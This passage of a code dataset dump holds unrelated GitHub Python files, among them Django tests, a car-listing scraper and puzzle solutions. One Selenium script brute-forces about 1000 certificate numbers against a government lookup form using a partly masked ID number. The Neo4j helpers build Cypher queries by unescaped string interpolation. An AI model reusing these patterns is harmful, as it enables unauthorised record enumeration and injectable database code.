-1)]:\r\n nx, ny = x + dx, y + dy\r\n if 0 <= nx < rows and 0 <= ny < cols and not visited[nx][ny] and grid[nx][ny] != block:\r\n visited[nx][ny] = True\r\n queue.append(((nx, ny), dist + 1))\r\n\r\n return -1 # Path not found\r\n\r\ndef find_positions(grid):\r\n for i in range(len(grid)):\r\n for j in range(len(grid[0])):\r\n if grid[i][j] == 'L':\r\n start = (i, j)\r\n elif grid[i][j] == 'B':\r\n end = (i, j)\r\n return start, end\r\n\r\ndef main(grid):\r\n start, end = find_positions(grid)\r\n return bfs(grid, start, end, 'R')\r\n\r\n# 사용자로부터 격자 입력 받기\r\ngrid = []\r\nfor _ in range(10):\r\n row = input()\r\n grid.append(row)\r\n\r\n# 결과 출력\r\nprint(main(grid))","repo_name":"hoonkiyeo/codetree-TILs","sub_path":"231217/L, R 그리고 B/l-r-and-b.py","file_name":"l-r-and-b.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4915989636","text":"from django.test import TestCase\n\n# Create your tests here.\nfrom urllib import response\nfrom django.urls import resolve\nfrom django.test import TestCase\nfrom 
lists.views import home_page, new_list, view_list\nfrom django.template.loader import render_to_string\nfrom lists.models import Item, List \n\n# Create your tests here.\nclass HomePageTest(TestCase):\n def test_root_url_resolves_to_home_page(self) -> None:\n found = resolve('/')\n self.assertEqual(found.func, home_page)\n\n \"\"\"\n def test_home_page_returns_correct_html(self) -> None:\n request = HttpRequest() #this is a request object that we manually created to our view\n response = home_page(request) #resolves into a HttpResponse object\n html = response.content.decode('utf-8')\n self.assertTrue(html.startswith(''))\n self.assertin('To-Do', html)\n self.assertTrue(html.endswith(''))\n\n we can also render our template here\n expected_response = render_to_string('home.html')\n self.assertEqual(html, expected_response)\n\n \"\"\"\n\n def test_home_page_returns_correct_html(self) -> None:\n response = self.client.get('/')\n self.assertTemplateUsed(response, 'home.html')\n \n # def test_can_save_a_POST_request(self) -> None:\n # self.client.post('/', data = {'item_text': 'A new item list'})\n # self.assertEqual(Item.objects.count(), 1)\n # new_item = Item.objects.first()\n # self.assertEqual(new_item.text, 'A new item list')\n\n # def test_redirects_afeter_a_POST(self) -> None:\n # response = self.client.post('/', data = {'item_text': 'A new item list'})\n # self.assertRedirects(response, '/lists/the-only-list-in-the-world/')\n\nclass ListViewTest(TestCase):\n\n def test_uses_list_template(self) -> None:\n list = List.objects.create()\n response = self.client.get(f'/lists/{list.id}/')\n self.assertTemplateUsed(response, 'list.html')\n\n def test_displays_only_items_for_that_list(self) -> None:\n correct_list = List.objects.create()\n Item.objects.create(text = 'Itemey 1', list = correct_list)\n Item.objects.create(text = 'Itemey 2', list = correct_list)\n other_list = List.objects.create()\n Item.objects.create(text = 'other list item 1', list = other_list)\n Item.objects.create(text = 'other list item 2', list = other_list)\n\n response = self.client.get(f'/lists/{correct_list.id}/')\n\n self.assertContains(response, 'Itemey 1')\n self.assertContains(response, 'Itemey 2')\n self.assertNotContains(response, 'other list item 1')\n self.assertNotContains(response, 'other list item 2')\n\n\nclass NewListItems(TestCase):\n def test_url_resolves_to_fucntion(self) -> None:\n found = resolve('/lists/new')\n self.assertEqual(found.func, new_list)\n\n def test_can_save_a_POST_request(self) -> None:\n self.client.post('/lists/new', data={'item_text': 'A new list item'})\n self.assertEqual(Item.objects.count(), 1)\n new_item = Item.objects.all()[0]\n self.assertEqual(new_item.text, 'A new list item')\n\n def test_Redirect_after_a_POST(self) -> None:\n response = self.client.post('/lists/new', data = { 'item_text': 'A new list item'})\n new_list = List.objects.first()\n self.assertRedirects(response, f'/lists/{new_list.id}/')\n\nclass NewItemTest(TestCase):\n\n def test_can_save_request_to_an_existing_list(self):\n other_list = List.objects.create()\n correct_list = List.objects.create()\n\n self.client.post(f'/lists/{correct_list.id}/add_item',\n data={'item_text': 'A new item for an existing list'}\n )\n\n self.assertEqual(Item.objects.count(), 1)\n new_item = Item.objects.first()\n self.assertEqual(new_item.text, 'A new item for an existing list')\n self.assertEqual(new_item.list, correct_list)\n\n def test_redirects_to_list_view(self):\n other_list = List.objects.create()\n correct_list = 
List.objects.create()\n\n response = self.client.post(f'/lists/{correct_list.id}/add_item',\n data={'item_text': 'A new item for an existing list'}\n )\n\n self.assertRedirects(response, f'/lists/{correct_list.id}/')\n\n def test_passes_correct_list_to_the_template(self) -> None:\n other_list = List.objects.create()\n correct_list = List.objects.create()\n response = self.client.get(f'/lists/{correct_list.id}/')\n self.assertEqual(response.context['list'], correct_list )\n\n\n\nclass ListAndItemModelsTest(TestCase):\n \n def test_saving_and_retrieving_items(self) -> None:\n list_ = List() #the name of the table is the name of the class \n list_.save()\n\n first_item = Item()\n first_item.text = 'The First (ever) list item'\n first_item.list = list_ \n first_item.save()\n\n second_item = Item()\n second_item.text = 'Item the second'\n second_item.list = list_\n second_item.save()\n\n saved_list = List.objects.first()\n self.assertEqual(saved_list, list_)\n\n saved_items = Item.objects.all()\n self.assertEqual(saved_items.count(), 2)\n \n first_saved_item = saved_items[0]\n second_saved_item = saved_items[1]\n self.assertEqual('The First (ever) list item', first_saved_item.text )\n self.assertEqual(first_saved_item.list, list_)\n self.assertEqual('Item the second', second_saved_item.text )\n self.assertEqual(second_saved_item.list, list_)\n","repo_name":"CoDedArch/Todo-List-TDD","sub_path":"lists/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"37737553999","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# author: Olivier Noguès\r\n\r\n\r\nimport json\r\nimport io\r\nimport zipfile\r\nfrom ares.Lib import AresImports\r\n\r\nfrom ares.Lib.html import AresHtml\r\n\r\n# External package required\r\nrender_template_string = AresImports.requires(name='flask', reason='URL remappings', install='No need to install', package='render_template_string', raiseExcept=False, sourceScript=__file__)\r\nurl_for = AresImports.requires(name='flask', reason='URL remappings', install='No need to install', package='url_for', raiseExcept=False, sourceScript=__file__)\r\n\r\n\r\nclass DownloadMemoryZip(AresHtml.Html):\r\n \"\"\"\r\n\r\n TODO Find a way to send the in memory file form a report: data: %(archive)s,\r\n \"\"\"\r\n alias, cssCls = 'anchorFMemory', ['btn', 'btn-success']\r\n references = ['https://newseasandbeyond.wordpress.com/2014/01/27/creating-in-memory-zip-file-with-python/']\r\n reqCss = ['bootstrap', 'font-awesome']\r\n file_location = 'data'\r\n\r\n def __init__(self, aresObj, vals, fileName, cssCls=None, cssAttr=None):\r\n super(DownloadMemoryZip, self).__init__(aresObj, vals, cssCls, cssAttr)\r\n self.fileName = fileName\r\n self.memory_file = io.BytesIO()\r\n self.zf = zipfile.ZipFile(self.memory_file, mode='w', compression=zipfile.ZIP_DEFLATED)\r\n\r\n def add(self, data, filename):\r\n \"\"\" Add the content of string to a file in the in-memory package\r\n\r\n :param data: The data\r\n :param filename: The filename\r\n :return:\r\n \"\"\"\r\n self.zf.writestr(filename, data)\r\n\r\n def namelist(self):\r\n \"\"\" Return the list of files in the in-memory zip archive\r\n\r\n :return:\r\n \"\"\"\r\n return self.zf.namelist()\r\n\r\n def __str__(self):\r\n \"\"\" The HTML object representation \"\"\"\r\n url = render_template_string('''{{ url_for(\\'ares.downloadMemory\\') }}''')\r\n self.aresObj.jsOnLoadFnc.add('''\r\n 
$('#%(htmlId)s').click(function() {\r\n $.ajax({\r\n url: %(url)s,\r\n type: \"POST\",\r\n contentType: attr( \"enctype\", \"multipart/form-data\" ),\r\n data: %(archive)s,\r\n success: success\r\n });\r\n });\r\n ''' % {'htmlId': self.htmlId, 'url': url, 'archive': self.zf})\r\n return '' % (self.strAttr(), self.vals)\r\n\r\n\r\nclass DropFile(AresHtml.Html):\r\n __reqCss, __reqJs = ['bootstrap', 'font-awesome'], ['bootstrap']\r\n __pyStyle = ['CssDropFile']\r\n name, category, inputType, callFnc, docCategory = 'Drop File Area', 'Input', \"file\", 'dropfile', 'Advanced'\r\n\r\n def __init__(self, aresObj, vals, tooltip, report_name, fileType):\r\n super(DropFile, self).__init__(aresObj, vals)\r\n self.tooltip(tooltip, location='bottom')\r\n self.report_name, self.dataType = report_name if report_name is not None else self.aresObj.run.report_name, fileType\r\n for action in [\"dragover\", \"dragleave\", \"dragenter\"]:\r\n self.jsFrg(action, \"event.originalEvent.preventDefault(); event.originalEvent.stopPropagation(); event.originalEvent.dataTransfer.dropEffect = 'copy';\")\r\n self.css( {\"display\": \"inline-block\", \"width\": '100%'})\r\n\r\n @property\r\n def jsQueryData(self): return {}\r\n\r\n def drop(self, url=None, jsData=None, jsFncs=None, httpCodes=None, isPyData=True, refresh=True, extensions=None):\r\n data = []\r\n if url is None:\r\n url = \"%s/upload/OUTPUTS/%s\" % (self.aresObj._urlsApp['ares-transfer'], self.report_name)\r\n if jsFncs is None:\r\n jsFncs = [ self.aresObj.jsReloadPage() ]\r\n elif not isinstance(jsFncs, list):\r\n jsFncs = [jsFncs]\r\n\r\n if jsData is not None:\r\n for rec in jsData:\r\n if isinstance(rec, tuple):\r\n if isPyData:\r\n data.append( \"data.append('%s', %s)\" % (rec[0], json.dumps(rec[1])) )\r\n else:\r\n data.append(\"data.append('%s', %s)\" % (rec[0], rec[1]))\r\n else:\r\n data.append(\"data.append('%s', %s)\" % (rec.htmlCode, rec.val))\r\n super(DropFile, self).drop('''\r\n event.originalEvent.preventDefault(); event.originalEvent.stopPropagation();\r\n var files = event.originalEvent.dataTransfer.files; var data = new FormData();\r\n $.each(event.originalEvent.dataTransfer.files, function(i, file) { \r\n var fileExt = '.' + file.name.split('.').pop() ;\r\n if ( %(extensions)s == null ) { data.append(file.name, file) ; } else {\r\n if (%(extensions)s.indexOf( fileExt ) >= 0) { data.append(file.name, file) ; } } });\r\n %(jsData)s; %(ajax)s; ''' % {\"jsData\": \";\".join(data), \"extensions\": json.dumps(extensions),\r\n \"ajax\": self.aresObj.jsAjax(url, success=\";\".join(jsFncs) if refresh else '' ) })\r\n return self\r\n\r\n def __str__(self):\r\n return '''\r\n
  %(vals)s
\r\n \r\n ''' % {'htmlId': self.htmlId, 'strAttr': self.strAttr(pyClassNames=self.__pyStyle), 'vals': self.vals, 'envs': self.report_name}\r\n\r\n\r\n","repo_name":"jeamick/ares-visual","sub_path":"Lib/html/AresHtmlFiles.py","file_name":"AresHtmlFiles.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14602994437","text":"def get_query_for_create_node(node, node_name='node'):\n return f'CREATE ({node_name}:{node.type}{get_string_params_from_dict(node.params)})'\n\n\ndef get_query_for_match_node(node, node_name='node', return_result=True):\n query = f'MATCH ({node_name}'\n if node.type:\n query += f': {node.type}'\n query += ')'\n if node.params:\n query += '\\nWHERE'\n for key in list(node.params)[:-1]:\n query += f' {node_name}.{str(key)} = \"{node.params[key]}\" AND'\n last_key = list(node.params)[-1]\n query += f' {node_name}.{last_key} = \"{node.params[last_key]}\"'\n if return_result:\n query += f'\\nreturn {node_name}'\n return query\n\n\ndef get_query_for_creating_couple(node1, edge, node2):\n query = get_query_for_match_node(node1, node_name='node1', return_result=False) + ' \\n'\n query += get_query_for_match_node(node2, node_name='node2', return_result=False) + ' \\n'\n query += f'CREATE (node1)-[:{edge.type}{get_string_params_from_dict(edge.params)}]->(node2)'\n return query\n\n\ndef get_query_for_merging_couple(node1, edge, node2):\n query = get_query_for_match_node(node1, node_name='node1', return_result=False) + ' \\n'\n query += get_query_for_match_node(node2, node_name='node2', return_result=False) + ' \\n'\n query += f'MERGE (node1)-[:{edge.type}{get_string_params_from_dict(edge.params)}]->(node2)'\n return query\n\n\ndef get_query_for_check_edge(node1, edge, node2):\n query = get_query_for_match_node(node1, node_name='node1', return_result=False) + '\\n'\n query += get_query_for_match_node(node2, node_name='node2', return_result=False) + '\\n'\n query += f'MATCH (node1)-[:{edge.type}{get_string_params_from_dict(edge.params)}]->(node2)\\n'\n query += 'RETURN node1, node2'\n return query\n\n\ndef get_string_params_from_dict(params: dict) -> str:\n string_params = '{'\n if params:\n for key in list(params)[:-1]:\n par = f'\"{params[key]}\"' if type(params[key]) == str else f'{str(params[key])}'\n string_params += str(key) + f': {par},'\n last_key = list(params)[-1]\n par = f'\"{params[last_key]}\"' if type(params[last_key]) == str else f'{str(params[last_key])}'\n string_params += str(last_key) + f':{par}'\n string_params += '}'\n return string_params\n\n\ndef get_query_for_match_node_in_couple(match_node, edge, other_node, revert=False):\n match_node_name = 'node1'\n other_node_name = 'node2'\n query = get_query_for_match_node(match_node, node_name=match_node_name, return_result=False) + '\\n'\n query += get_query_for_match_node(other_node, node_name=other_node_name, return_result=False) + '\\n'\n if revert:\n match_node_name, other_node_name = other_node_name, match_node_name\n\n query += f'MATCH (node1)-[:{edge.type}{get_string_params_from_dict(edge.params)}]->(node2)\\n'\n query += f'RETURN {match_node_name}'\n\n return query\n","repo_name":"Nutrymaco/catalog","sub_path":"neo4j_utils/graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18851593888","text":"import context\nimport argparse\nimport colorama\nfrom colorama import 
Fore, Style\nfrom src.render_job_list import RenderJobList\nfrom src.render_job import RenderJob\nfrom src.render_manager import RenderManager\nfrom src.render_environment import RenderEnvironment\nfrom src.render_packer import RenderPacker\nfrom src.batch_manager import BatchManager\nfrom src.blob_manager import BlobManager\nfrom src.stack_config_manager import StackConfigManager\nfrom src.render_job_status import RenderJobStatus\n\ndef parse_args():\n parser = argparse.ArgumentParser('Manages cloud renders')\n parser.add_argument('command', type=str)\n parser.add_argument('-j', '--jobfile', required=False, type=str, default='joblist.csv')\n parser.add_argument('-b', '--blend', required=False, type=str, default=None)\n parser.add_argument('-a', '--additionalfile', required=False, action='append')\n parser.add_argument('-S', '--scene', required=False, type=str, default=\"Scene\")\n parser.add_argument('-x', '--xres', required=False, type=int, default=1920)\n parser.add_argument('-y', '--yres', required=False, type=int, default=1080)\n parser.add_argument('-p', '--percentage', required=False, type=int, default=100)\n parser.add_argument('-s', '--samples', required=False, type=int)\n parser.add_argument('-t', '--step', required=False, type=int, default=1)\n parser.add_argument('-f', '--startframe', required=False, type=int, default=1)\n parser.add_argument('-e', '--endframe', required=False, type=int, default=-1)\n parser.add_argument('-k', '--breaksize', required=False, type=int, default=-1)\n parser.add_argument('-d', '--description', required=False, type=str)\n parser.add_argument('-r', '--dryrun', required=False, type=str, default='False')\n parser.add_argument('--dates', required=False, type=str, default='False')\n parser.add_argument('--stackname', required=False, type=str)\n parser.add_argument('--large', required=False, type=str, default='False')\n \n return parser.parse_args()\n\ndef load(args):\n return RenderJobList.load(args.jobfile)\n\ndef validate_add(args):\n pass\n\ndef command_add(args):\n validate_add(args)\n jobs = load(args)\n\n packer = RenderPacker() \n\n job = RenderJob()\n job.source_blend_path = args.blend\n job.package = packer.pack(args.blend, args.additionalfile)\n job.description = args.description\n job.additional_file_count = len(args.additionalfile) if args.additionalfile != None else 0\n job.scene = args.scene\n job.startframe = args.startframe\n job.endframe = args.endframe\n job.step = args.step\n job.xres = args.xres\n job.yres = args.yres\n job.samples = args.samples\n job.percentage = args.percentage\n job.use_large_disk = truthy(args.large)\n\n job.prepare()\n\n if args.breaksize >= 1:\n if job.startframe < 1 or job.endframe < 1:\n raise Exception(\"Can only break a job if -f/--startframe and -e/--endframe are specified.\")\n job.break_job(args.breaksize)\n\n job.describe(True)\n jobs.rootjobs.append(job)\n jobs.save()\n\ndef command_break(args):\n if not args.breaksize > 0:\n raise Exception(\"Break size not specified.\")\n\n jobs = load(args)\n\n rootjobs = jobs.rootjobs.copy()\n for job in rootjobs:\n if not any(job.children) or job.status != RenderJobStatus.Pending:\n print(\"Breaking job...\")\n job.break_job(args.breaksize)\n job.describe(True)\n jobs.save()\n\ndef command_process(args):\n jobs = load(args)\n manager = get_manager()\n manager.process_list(jobs, is_dry_run(args))\n\ndef command_describe(args):\n jobs = load(args)\n jobs.describe(dates=truthy(args.dates))\n\ndef command_init(args):\n jobs = RenderJobList()\n 
jobs.save_as(args.jobfile)\n jobs.describe()\n\ndef command_configure(args):\n if not args.stackname:\n raise Exception('--stackname is required.')\n\n scm = StackConfigManager()\n outputs = scm.get_outputs(args.stackname)\n\n env = RenderEnvironment.from_stack_outputs(outputs)\n env.save()\n print('Configuration saved.')\n\n\ndef is_dry_run(args):\n return args.dryrun in ['true', 'TRUE', 'True']\n\ndef truthy(arg):\n return arg in ['true', 'TRUE', 'True']\n\ndef get_manager():\n env = get_environment()\n return RenderManager(env, BatchManager(env), BlobManager(env))\n\ndef get_environment():\n return RenderEnvironment.load() \n \ndef do_main():\n colorama.init()\n args = parse_args()\n if args.command == 'add':\n command_add(args)\n elif args.command == 'describe':\n command_describe(args)\n elif args.command == 'process':\n command_process(args)\n elif args.command == 'init':\n command_init(args)\n elif args.command == 'configure':\n command_configure(args)\n elif args.command == 'break':\n command_break(args)\n\nif __name__ == '__main__':\n try:\n do_main()\n finally:\n print(Fore.RESET + Style.RESET_ALL)\n\n\n ","repo_name":"petetaxi-test/AwsBatchBlender","sub_path":"rendercli/src/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"50"} +{"seq_id":"16066927448","text":"#!/usr/bin/python3\n'''Python Module'''\n\n\ndef minOperations(n):\n '''Script to calculate the minimun number of ops needed'''\n number_ops = 0\n idx = 2\n # We try to reduce n to 1\n while n > 1:\n if (n % idx == 0):\n # We acumulate the number of operations needed\n number_ops += idx\n # And reduce n\n n = n / idx\n else:\n idx += 1\n return number_ops\n","repo_name":"dlscoccia/holbertonschool-interview","sub_path":"0x03-minimum_operations/0-minoperations.py","file_name":"0-minoperations.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18507752633","text":"from flask import Flask, render_template, request\nfrom selenium import webdriver\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom selenium.webdriver.common.by import By\nimport time\nimport os\nimport csv\n\n\napp = Flask(__name__)\n\n\ndef update_cars():\n if not os.path.exists('cars.csv') or (time.time()- os.path.getmtime('cars.csv')) > 600:\n browser = webdriver.Chrome(f\"{os.getcwd()}/chromedriver.exe\")\n time.sleep(2)\n next_page = True\n car_list = []\n link= 'https://www.sahibinden.com/arazi-suv-pickup-citroen-c3-aircross-1.5-bluehdi-feel'\n while next_page:\n browser.get(link)\n time.sleep(2)\n cars = browser.find_elements(by=By.CSS_SELECTOR,value='.searchResultsItem')\n for c in cars:\n if c.get_attribute('data-id') is None:\n \"\"\" for advertisement not taken \"\"\"\n continue\n else:\n infos= c.find_elements(by= By.CSS_SELECTOR, value='.searchResultsAttributeValue')\n price = c.find_elements(by=By.CSS_SELECTOR, value='.searchResultsPriceValue')\n location = c.find_elements(by=By.CSS_SELECTOR, value='.searchResultsLocationValue')\n car_list.append({'year': int(float(infos[0].text)),\n 'km': int(infos[1].text.replace('.','')),\n 'calor': infos[2].text,\n 'price': int(price[0].text.replace('.','').replace('TL','')),\n 'location': location[0].text.replace('\\n',' ')})\n\n time.sleep(3)\n next_link = browser.find_elements(by= By.CSS_SELECTOR, value = '.prewNextBut')\n next_page = False if len(next_link)== 0 else True\n for n in 
next_link:\n                if n.get_attribute('title')== 'Sonraki':\n                    link = n.get_attribute('href')\n                    next_page= True\n\n                else:\n                    next_page = False\n\n\n        browser.close()\n        with open('cars.csv', 'w', newline='') as f:\n            writer = csv.writer(f)\n            writer.writerow(['year','km','calor','price','location'])\n            for car in car_list:\n                writer.writerow([car['year'], car['km'],car['calor'],car['price'], car['location']])\n\n    else:\n        car_list = []\n        with open('cars.csv','r') as f:\n            reader = csv.reader(f)\n            for row in reader:\n                try:\n                    car_list.append({'year': int(row[0]),\n                                     'km': int(row[1]),\n                                     'calor': (row[2]),\n                                     'price': int(row[3]),\n                                     'location': (row[4])})\n                except:\n                    continue\n\n    return car_list\n@app.route('/image.jpg')\ndef image():\n    car_list = update_cars()\n    plt.figure(figsize= (10,8))\n    plt.xlabel('KM')\n    plt.ylabel('Price')\n    plt.title('Car Data From Sahibinden')\n    plt.scatter(list(map(lambda x: x['km'],car_list)), list(map(lambda x: x['price'], car_list)))\n    plt.savefig('image.jpg')\n    return open('image.jpg','rb').read()\n\n@app.route('/')\ndef index():\n    car_list = update_cars()\n    return render_template('index.html', title='Data From Sahibinden', cars=car_list)\n\n\nif __name__ == '__main__':\n    app.run()\n\n\n","repo_name":"sedanurakcil/DataVisualizationProjects","sub_path":"cars_sahibinden/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"70174719195","text":"from aocd import get_data, submit\n\nimport re\n\nfrom elfcode import *\n\n\ndef day19(submit_answer=False):\n    data = get_data(day=19, year=2018).split(\"\\n\")\n\n    registers = [0] * 6\n    ip_register = int(re.findall(\"(\\\\d)+\", data[0])[0])\n    program_data = data[1::]\n\n    for i, line in enumerate(program_data):\n        opcode, *args = line.split()\n        program_data[i] = (opcode, *map(int, args))\n\n    while registers[ip_register] < len(program_data):\n        opcode, *args = program_data[registers[ip_register]]\n        opcodes[opcode](registers, *args)\n        registers[ip_register] += 1\n\n    answer1 = registers[0]\n\n    registers = [0] * 6\n    registers[0] = 1\n\n    while registers[0] != 0:\n        opcode, *args = program_data[registers[ip_register]]\n        opcodes[opcode](registers, *args)\n        registers[ip_register] += 1\n\n    number = max(registers)\n\n    answer2 = 0\n    for factor in range(1, number + 1):\n        if number % factor == 0:\n            answer2 += factor\n\n    if submit_answer:\n        submit(answer1, 1, day=19, year=2018)\n        submit(answer2, 2, day=19, year=2018)\n    return answer1, answer2\n","repo_name":"davchoo/AdventOfCode2018","sub_path":"day_19_2018.py","file_name":"day_19_2018.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"40202589300","text":"import FWCore.ParameterSet.Config as cms\n\n#from L1Trigger.L1TMuonEndCap.fakeEmtfParams_cff import *\n\nfrom CondCore.CondDB.CondDB_cfi import CondDB\nCondDB.connect = cms.string('oracle://cms_orcon_prod/CMS_CONDITIONS')\n\nl1emtfparProtodb = cms.ESSource(\"PoolDBESSource\",\n    CondDB,\n    toGet = cms.VPSet(\n        cms.PSet(\n            record = cms.string('L1TMuonEndCapParamsRcd'),\n            tag = cms.string('L1TMuonEndCapParamsPrototype_Stage2v0_hlt')\n        )\n    )\n)\n\nL1TMuonEndCapParamsOnlineProd = cms.ESProducer(\"L1TMuonEndCapParamsOnlineProd\",\n    onlineAuthentication = cms.string('.'),\n    forceGeneration = cms.bool(True),\n    onlineDB = cms.string('oracle://CMS_OMDS_LB/CMS_TRG_R'),\n    transactionSafe = cms.bool(True) # nothrow guarantee if set to 
False: carry on no matter what\n)\n","repo_name":"cms-sw/cmssw","sub_path":"L1TriggerConfig/L1TConfigProducers/python/L1TMuonEndCapParamsOnline_cfi.py","file_name":"L1TMuonEndCapParamsOnline_cfi.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"}
+{"seq_id":"26052220894","text":"from selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nimport time\n\n\"\"\"\nCreated by kuu-kie on 2022/06/04\nNotes:\nThe program relies on the Firefox browser that ships with Linux.\nRuntime environment: the anaconda libraries, Python 3.8.\n\nEdit the relevant strings in the code before running.\n\nCode description:\nselenium is a packaged library for simulating keyboard and mouse events (install with pip install selenium).\nFirst load the driver and connect it to Firefox; the driver is an open-source package from GitHub.\nThen visit the web page.\nThen loop: enter the form data, submit, and go back.\nDrawback:\nYou have to keep watching once the program is running; there is no break after a match is found.\ntime is only used to tune the speed a little.\n\nUpdate V1:\nThe program can now break once a match is found.\nYou can remove time.sleep when running and let it run at full speed.\n\"\"\"\n\nbrowser = webdriver.Firefox(executable_path=\"/home/kuukie/PycharmProjects/AutomaticClick/geckodriver-v0.31.0-linux64/geckodriver\")\nbrowser.get(\"https://www.miiteec.org.cn/plus/list.php?tid=247\")\n\nfor i in range(0, 1000):\n    el1_s = Select(browser.find_element_by_id(\"kaoshi\"))\n    el2_s = Select(browser.find_element_by_id(\"zhengshu\"))\n    el3 = browser.find_element_by_id(\"identify\")\n    el4 = browser.find_element_by_id(\"proof\")\n    el5 = browser.find_element_by_id(\"submit\")\n\n    el1_s.select_by_value(\"3\")\n    el2_s.select_by_value(\"309\")\n    el3.send_keys(\"370***********6629\")\n    if i < 10:\n        el4.send_keys(\"L210020100200\" + \"00\" + str(i))\n    elif i < 100:\n        el4.send_keys(\"L210020100200\" + \"0\" + str(i))\n    else:\n        el4.send_keys(\"L210020100200\" + str(i))\n    el5.click()\n\n    # time.sleep(0)\n\n    el_r = browser.find_element_by_class_name(\"plist2_p\")\n    result = False\n    l_el_r = el_r.find_elements_by_xpath(\"div/label\")\n    d_el_r = el_r.find_elements_by_xpath(\"div\")\n    for label in l_el_r:\n        result = True\n    if result:\n        for div in d_el_r:\n            print(div.text)\n        break\n    browser.back()\n","repo_name":"kuukie-kq/HodgePodge","sub_path":"Cpycharm/automatic_click_html.py","file_name":"automatic_click_html.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"71797175834","text":"import numpy as np\n\ndef makeAbun(solar_abun, abun_file, COratio, solar_times=1):\n    \"\"\"\n    Makes the abundances file to be used by TEA.\n    The function reads the Asplund et al. (2009) elemental abundances file\n    http://adsabs.harvard.edu/abs/2009ARA%26A..47..481A, (abundances.txt),\n    sets the C/O ratio as requested, and/or multiplies the abundances of metal\n    elements (all except He and H) by the desired multiplication factor. 
\n The C/O ratio is set by fixing the O abundance to the solar value and\n changing the C elemental abundance so C/O ratio is as requested.\n\n Parameters\n ----------\n solar_abun: String\n Input Solar abundances filename.\n abun_file: String\n Output filename to store the modified elemental abundances.\n COratio: Float\n Desired C/O ratio.\n \n Optional parameters\n -------------------\n solar_times: Float\n Multiplication factor for metal elemental abundances (everything\n except H and He).\n\n Returns\n -------\n None\n\n Example\n -------\n solar_abun = 'abundances.txt'\n abun_file = 'CO1.2abun.txt'\n COratio = 1.2\n makeAbun(solar_abun, abun_file, COratio)\n\n Revisions\n ---------\n 2015-10-25 Jasmina Written by.\n \"\"\"\n\n\n # Read the elemental-abundances file:\n f = open(solar_abun, 'r')\n lines = f.readlines()\n f.close()\n\n # Count the number of elements:\n nelem = len(lines)\n for line in lines:\n if line.startswith(\"#\"):\n nelem -= 1\n\n # Allocate arrays to put information:\n index = np.zeros(nelem, int)\n symbol = np.zeros(nelem, '|S2')\n dex = np.zeros(nelem, np.double)\n name = np.zeros(nelem, '|S20')\n mass = np.zeros(nelem, np.double)\n\n # Store data into the arrays:\n i = 0\n for line in lines:\n if not line.startswith(\"#\"):\n index[i], symbol[i], dex[i], name[i], mass[i] = line.strip().split()\n i += 1\n\n # Count the number of elements:\n nelem = len(symbol)\n\n # Scale the metals aundances:\n imetals = np.where((symbol != \"H\") & (symbol != \"He\"))\n dex[imetals] += np.log10(solar_times)\n\n # Calculate C and O abundances based on C/O requested:\n Odex = dex[np.where(symbol == \"O\")]\n dex[np.where(symbol == \"C\")] = np.log10(COratio) + Odex\n \n # Save data to file\n f = open(abun_file, \"w\")\n # Write header\n f.write(\"# Elemental abundances:\\n\"\n \"# Columns: ordinal, symbol, dex abundances, name, molar mass.\\n\")\n # Write data\n for i in np.arange(nelem):\n f.write(\"{:3d} {:2s} {:5.2f} {:10s} {:12.8f}\\n\".format(\n index[i], symbol[i], dex[i], name[i], mass[i]))\n f.close()\n\n","repo_name":"dzesmin/TEA","sub_path":"scripts/makeAbun.py","file_name":"makeAbun.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"50"} +{"seq_id":"39446586282","text":"def triplet_skip(word, i):\n\t\"\"\"Takes a string and an i as input and returns a string made up\n\tof a triplet of every other character starting at i\"\"\"\n\n\treturn word[i] + word[i + 2] + word[i + 4]\n\ndef triple_consecutive_letters(word):\n\t\"\"\"Takes a word as input and outputs true is that word contains three\n\tconsecutive double letters\"\"\"\n\n\t# If a word has three consecutive double letters, then a series of three letters\n\t# skipping every letter would be the same starting at i and i+1\n\tfor i in range(len(word) - 5):\n\t\t if triplet_skip(word, i) == triplet_skip(word, i + 1):\n\t\t \treturn True\n\n\treturn False\n\nfin = open(\"words.txt\")\nfor line in fin:\n\tif triple_consecutive_letters(line.strip()):\n\t\tprint(line.strip())","repo_name":"AHKerrigan/Think-Python","sub_path":"exercise9_7.py","file_name":"exercise9_7.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19108394660","text":"import re\nt = int(input())\nfor z in range(t) :\n\tn,m,x = input().split(\" \")\n\tn,m,x = int(n),int(m),int(x)\n\tnumber_string = '1'\n\tmax_number = '9'\n\tfor i in range(n-1) :\n\t\tnumber_string 
